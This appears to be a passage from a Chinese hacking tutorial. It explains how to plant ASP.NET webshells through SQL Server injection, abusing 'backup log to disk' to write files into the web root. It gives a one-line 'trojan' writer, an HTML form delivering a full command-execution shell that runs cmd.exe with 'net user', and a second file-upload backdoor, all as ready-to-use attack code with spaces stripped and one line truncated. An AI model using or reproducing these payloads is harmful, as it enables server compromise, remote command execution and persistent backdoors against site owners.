1.相当于ASP的一句话木马:
程序代码
alterdatabasepubssetRECOVERYFULL--
createtablepubs.dbo.cmd(aimage)
backuplogpubstodisk='c:\TM'withinit
insertintopubs.dbo.cmd(a)values('<%@PageLanguage="C#"validateRequest="false"%><%System.IO.StreamWriterow=newSystem.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%>')
backuplogpubstodisk='d:\test11.aspx'
//这个和asp的一样,客户端post一个变量l把木马代码丢在变量l里面就ok了这个是类似asp的一句话木马。
//mu.aspx.htm客户端:(提交后访问:http://IP/images.aspx)
<formaction=http://192.168.2.100/asp/mu.aspxmethod=post>
<b>在下面输入大马内容:</b><br>
<textareaname=lcols=120rows=35width=45>
<%@PageLanguage="VB"Debug="true"%>
<%@importNamespace="system.IO"%>
<%@importNamespace="System.Diagnostics"%>
<scriptrunat="server">
SubRunCmd(SrcAsObject,EAsEventArgs)
DimmyProcessAsNewProcess()
DimmyProcessStartInfoAsNewProcessStartInfo(xpath.Text)
myProcessStartInfo.UseShellExecute=False
myProcessStartInfo.RedirectStandardOutput=true
myProcess.StartInfo=myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
DimmyStreamReaderAsStreamReader=myProcess.StandardOutput
DimmyStringAsString=myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text=vbcrlf&"<pre>"&mystring&"</pre>"
EndSub
</script><html><head>
<title>ASP.NETShellforWebAdmin2.XFinal</title>
<metahttp-equiv="Content-Type"c/></head><body>
<formrunat="server">
<asp:Labelid="L_p"style="COLOR:#0000ff"runat="server"width="80px">;Program</asp:Label>
<asp:TextBoxid="xpath"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;BORDER-BOTTOM:#084b8e1pxsolid"runat="server"Width="300px">c:\windows\system32\cmd.exe</asp:TextBox><br/>
<asp:Labelid="L_a"style="COLOR:#0000ff"runat="server"width="80px">Arguments</asp:Label>
<asp:TextBoxid="xcmd"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;BORDER-BOTTOM:#084b8e1pxsolid"runat="server"Width="300px"Text="/cnetuser">/cnetuser</asp:TextBox><br/>
<asp:Buttonid="Button"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;COLOR:#ffffff;BORDER-BOTTOM:#084b8e1pxsolid;BACKGROUND-COLOR:#719bc5" runat="server"Width="100px"Text="Run"></asp:Button><p>
<asp:Labelid="result"style="COLOR:#0000ff"runat="server"></asp:Label></p></form></body></html>
</textarea><BR><center><br>
<inputtype=submitvalue=提交>
2、下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用:
程序代码
droptablepubs.dbo.cmd
alterdatabasepubssetRECOVERYFULL
createtablepubs.dbo.cmd(aimage)
backuplogpubstodisk='c:\TM'withinit
insertintopubs.dbo.cmd(a)values('<scriptlanguage="c#"runat="server">privatevoidbc(objecto,EventArgse){stringu="files";stringfilename;intpos=f.PostedFile.FileName.LastIndexOf("+1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><formmethod="post"runat="server"><inputtype="file"id="f"runat="server"/><inputtype="submit"value="ss"runat="Server" /></form>')
backuplogpubstodisk='c:\inetpub\wwwroot\test11.aspx'
当前位置:
